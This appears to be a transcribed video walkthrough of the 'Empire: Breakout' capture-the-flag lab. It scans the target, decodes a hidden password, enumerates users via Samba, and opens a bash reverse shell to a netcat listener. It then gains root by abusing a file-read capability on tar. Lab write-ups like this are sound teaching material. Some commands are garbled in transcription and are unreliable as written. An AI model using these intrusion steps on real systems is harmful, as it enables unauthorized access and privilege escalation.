Hi, today I'm going to show you how to get root access to the Breakout machine, which is the first of two machines in the Empire series. As I go along, I will do my best to explain what I'm doing and why, and hopefully you will be able to apply what you learn here to future machines. Let's get started. As always, we're going to start by scanning the network for our target machine. I can use the ifconfig command to identify my host machine, in my case it's 10.0.2.25, and then scan that network with the command nmap 10.0.2.0/24. We get three results: 10.0.2.1, which is the default gateway, 10.0.2.25, which we know is our host machine, and 10.0.2.32, which is our target machine. While I can already see which ports are open on my target machine, I'd like a bit more information, such as what services are running on them and what versions they are, so I'm going to run nmap again. This time, I'm going to add the "A" modifier, which allows for service version and operating system detection, and I'm only going to scan the target machine rather than everything on the network. With that done, let's take a look at our open ports. We have port 80, which is an HTTP port, meaning that this machine is hosting a web server. Ports 139 and 445 are used for NetBIOS and server message block respectively, both of which are involved in file and printer sharing services and are running Samba, which is a service that allows Windows and Linux machines to share file and printer services. Ports 10,000 and 20,000 are more HTTP ports. The first thing we are going to do is check out these three open HTTP ports. Open up your browser and navigate to your target IP address. By default, your browser will connect via port 80, but to view our other two open ports, we need to specify the port number by adding a colon and the port numbers after the IP address. Also note that the two additional HTTP ports are using a secure connection, and you will need to specify HTTPS rather than the insecure HTTP. Port 80 takes us to a default Apache page. Port 10,000 takes us to a login page for webmin, and port 20,000 takes us to an almost identical login page for usermin. We don't have any login credentials yet, so we're going to leave this page for now and go back to our default Apache page. At this stage of any attempt to gain access to a machine, we are just trying to gather any potentially useful information. Normally, I would do directory enumeration using a tool such as Derb or GoBuster, and I've used them a lot in other videos, but I already know from the first time I did this machine prior to recording this video that there isn't anything interesting to be found that way. Instead, we're going to check the page source for our Apache page, as developers sometimes leave notes there. If we scroll down to the bottom, we find a note suggesting that the long string of symbols is an encrypted login. This is not a form of encryption I had ever come across before doing this machine, so before we can decrypt it, we need to know what it is. Copy the string and navigate to a cipher identifier website such as Decode. Paste the string and hit Analyze. It gives us a few possibilities, but the most likely is the brainfuck cipher. Interestingly, ChatGPT was also able to successfully identify this cipher, and the use of AI to identify encryption is an interesting area, but be warned, it was unable to decode the string correctly. For now, let's just use Decode. Click on the brainfuck cipher, paste in our string, and click Execute. It will give us another string of characters ending in A-3. We know from the hint in the page source that this is part of a login, and is unlikely to be a username, so we can assume that it's a password. Therefore, our next step is to see if we can find a username somewhere. User enumeration is a great way of gaining access to a system, as it is typically far less time-consuming than a brute force approach, and is less likely to trigger security systems or account lockouts. In our case, we're going to use a tool called enum for Linux. Enum for Linux is a free tool for enumerating information from Windows and Samba systems, including users, workgroups, password policies, etc. But for our purposes, we are only really interested in users. The way this works is through a process called RID cycling. RID stands for Relative Identifier, which is a unique identifier for every security principal, such as users, groups, and computers, within the Security Identifier Structure, or SID. For each RID value, enum for Linux will query the domain controller to see if a user exists within that RID, and if they do, it will retrieve information about that account, such as username and group memberships. Now, do you really need to know how this works to utilize enum for Linux? Not really, but it does help to understand what is happening when you interpret the output of your command. Let's run the command enum for Linux 10.0.2.32. We can see from our result that it has identified several SIDs and that it has identified a local user named Cyber in one of them. Now that we have a username, let's see if we are able to log in to either the webmin or usermin page we found earlier. I know from the first time I did this machine that the webmin page doesn't work, but if we go back to the usermin page on port 20,000, we can enter the username Cyber and our decrypted string of characters as a password, and we are able to log in. From here, if we look at the menu bar on the left, we see an option at the bottom of the page to open a command shell. This is nice, but I would rather have the full functionality of a bash terminal. To do this, I'm going to set up a netcat listener on my host machine with the command nc-lnvp1234. This tells the system I want to run netcat, nc, to listen for incoming connections, L, to disable DNS resolution, N, to use verbose mode, V, and to use a specific port, P. Back in my usermin command shell, I am going to run the command /bin/bash -i >_dev/tcp/10.0.2.25/1234 0 >1. This tells the system that I want to run a bash shell in interactive mode and that I want to redirect everything to a specified IP address and port. Back on my host machine, I should now have access to the target machine. Let's test it with the ls command. We can see a file called tar and a user flag. Let's read the user flag with the cat command. So that's user access achieved, but now we want to escalate our privileges and get root access. When conducting privilege escalation, we want to find some process or application that can be run at a higher level of privilege than the standard user, and then exploit that privilege to give ourselves more permissions. To do this, we're going to use the command getcap/r/2 > dev/null. The getcap command is used to list capabilities of files. The -r makes the search recursive, in other words, it searches subfolders and directories. The / denotes the root directory, and the 2 > dev/null will suppress error messages. The first result is that tar file we saw earlier, which is followed by cap-read search = EP. What that means is that the cap-read search capability is set to both effective and permitted, E and P. In other words, tar is able to bypass file read and directory search permission checks, and this capability is inherited when executing other programs. There are lots of ways we could find a way to exploit this. We could search for files that requires root permissions to read, or we could try to open up an application like Vi or Nano to create a root shell. But in this case, we are going to do some manual enumeration. This involves simply looking through directories for things that could be useful. You can do this on your own, but a useful folder is in the var directory and is called backups. We can navigate straight to it with the command cd/var/backups/. Use the ls-la command to list the contents and their permissions. We can see a file called old_pass.back. Now we are going to use tar to archive and then extract the contents of that file. Navigate back to the directory containing tar with the command cd/home/cyber. Then use the command /tar-cvf old_pass/var/backup/.old_pass.back. Let's break down that command. The /tar tells the system to run the tar application within the current directory. C tells the tar to create a new archive, V is verbose mode, and F specifies the name of the new archive, in our case, old_pass. We then provide the contents to be archived, in this case the .old_pass.back in the backups folder. Now, let's extract the contents of our new archive with the command /tar-xvf old_pass. This time, we used the X flag to extract instead of the C for create. Now, let's read it with cat var/backups/.old_pass.back. What we have done here is exploit the fact that tar can bypass permission checks to read the previously unreadable password backup file, and we can see that we now have a password. Let's switch to root user with the command su root and enter our newfound password. Verify you are root with the whoami command. All that's left is to navigate to the root home directory with cd/root. List the contents with ls and use cat to read the root flag. So there you go, we have achieved root access to the Empire Breakout machine. In summary, we scanned the network for the target machine, identified and decrypted a password, used RID cycling to enumerate a username, created a reverse shell, identified an application with additional privileges, and exploited those privileges to gain root access to the machine. I hope you enjoyed this video, and until next time, good luck with your own hacking exploits.